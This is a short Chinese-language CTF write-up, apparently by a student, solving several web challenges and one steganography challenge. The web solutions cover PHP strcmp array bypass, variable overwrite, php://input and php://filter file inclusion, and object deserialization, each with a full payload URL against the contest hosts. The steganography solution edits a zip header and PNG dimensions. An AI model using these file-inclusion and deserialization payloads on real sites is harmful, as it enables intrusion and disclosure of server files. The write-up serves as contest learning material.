因为在上课,做的时间较短
Web
签到题
限制了最大输入长度为3位
Burpsuite拦截输入个较大的数即可
简单的题
有源码
利用PHP的strcmp函数漏洞,输入一个数组即可
送大礼
打开后是一大堆JSFUCK,扔进控制台里得到PHP源码
看源码是变量覆盖
Payload:http://04c432a12784d2fb5ef431ec3366bc9a.yogeit.com:8080/?bdctf=&flag=
得到flag
蓝盾管理员
给出了源码
见过很多次的代码,一道经典题的一部分
用PHP输入流php://input满足if条件然后文件包含读取flag.php
Payload:
http://2a8da10821f39ea335a12fba77f7c3fc.yogeit.com:8080/?user=php://input&file=php://filter/read=convert.base64-encode/resource=flag.php
Base64解码得到flag
Bluedon用户
一道经典题,前面那道题的完整版
同样的方法先读index.php的源码,再读class.php的源码
利用class.php的Read类和反序列化通过pass来读取fla9.php
payload:
http://11537c131de3f8b2060b36c0cf7eb083.yogeit.com:8080/?user=php://input&file=class.php&pass=O:4:%22Read%22:1:{s:4:%22file%22;s:8:%22f1a9.php%22;}
WEB100-2
有提示,输入?hint后看到源码
Cookie传参并且反序列化后和变量KEY全等
将KEY的值序列化即可,但是这个%3B坑了很多人(我也被坑了,最后还是问的学长)
除了这几道Web我还做了道隐写
像素隐藏
下载下来为rar文件,解压后里面有个zip文件,可以看到里面有张PNG图片,但是需要解压密码,题目没有任何关于密码的提示,猜测是zip伪加密
010editor打开,搜索504B0102,将140009改为140000
加密状态消失,解压出PNG图片
开始不是很明白题目名:“像素隐藏”什么意思,思考了一阵想起来做过的一道题
直接用TweakPNG打开,IHDR的crc验证报错了,应该是改了图片的宽或高
查看下宽高的像素,直接改成500,得到flag
就到这里为止了